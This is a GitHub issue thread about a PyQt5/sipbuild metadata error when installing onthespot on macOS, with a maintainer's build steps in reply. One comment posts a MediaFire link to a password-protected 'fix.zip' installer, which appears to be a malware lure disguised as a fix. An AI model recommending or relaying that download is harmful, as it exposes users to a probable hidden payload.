### ISSUE TITLE
[BUG] Subprocess exited with error + Metadata generation failed

### ISSUE THREAD

**Issue by judedanielsmith** [casualsnek/onthespot#150]
Hey all. trying to install onthespot on mac. Whether I'm trying to install requirements or run the build file, I get this error message.

--

Preparing metadata (pyproject.toml) ... error
  error: subprocess-exited-with-error
  
  × Preparing metadata (pyproject.toml) did not run successfully.
  │ exit code: 1
  ╰─> [21 lines of output]
      pyproject.toml: line 7: using '[tool.sip.metadata]' to specify the project metadata is deprecated and will be removed in SIP v7.0.0, use '[project]' instead
      Querying qmake about your Qt installation...
      Traceback (most recent call last):
        File "/Users/username/onthespot/venv/lib/python3.12/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 353, in <module>
          main()
        File "/Users/username/onthespot/venv/lib/python3.12/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 335, in main
          json_out['return_val'] = hook(**hook_input['kwargs'])
                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "/Users/username/onthespot/venv/lib/python3.12/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 152, in prepare_metadata_for_build_wheel
          whl_basename = backend.build_wheel(metadata_directory, config_settings)
                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "/private/tmp/pip-build-env-ecw9b5tl/overlay/lib/python3.12/site-packages/sipbuild/api.py", line 28, in build_wheel
          project = AbstractProject.bootstrap('wheel',
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "/private/tmp/pip-build-env-ecw9b5tl/overlay/lib/python3.12/site-packages/sipbuild/abstract_project.py", line 74, in bootstrap
          project.setup(pyproject, tool, tool_description)
        File "/private/tmp/pip-build-env-ecw9b5tl/overlay/lib/python3.12/site-packages/sipbuild/project.py", line 624, in setup
          self.update(tool)
        File "/private/tmp/pip-install-kbr379aw/pyqt5_ef134987c4814a78b7603fac398bc418/project.py", line 165, in update
          raise UserException(
      sipbuild.exceptions.UserException
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed

× Encountered error while generating package metadata.
╰─> See above for output.

--

Any ideas?

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by justin025** [comment]
I have macos builds [here](https://github.com/justin025/onthespot/releases/tag/v0.6), when i built 0.6 I pretty much ran below and it ran fine.
`brew install python ffmpeg` 
`python -m venv venv`
`source venv/bin/activate`
`pip install -r requirements.txt`
`build_mac.sh`

you explain the steps you took, also use requirements from my repo instead, the one here is outdated

**Comment by judedanielsmith** [comment]
hey - thanks for the updated repo, it gets to preparing metadata when installing the requirements text, mac gets extremely hot and nothing happens. process doesn't terminate but just stays extremely hot, do I need to wait a while or is there something not working?

**Comment by justin025** [comment]
Sorry for forgetting but `brew install ffmpeg` might fix this. Make sure to build from 0.6.1
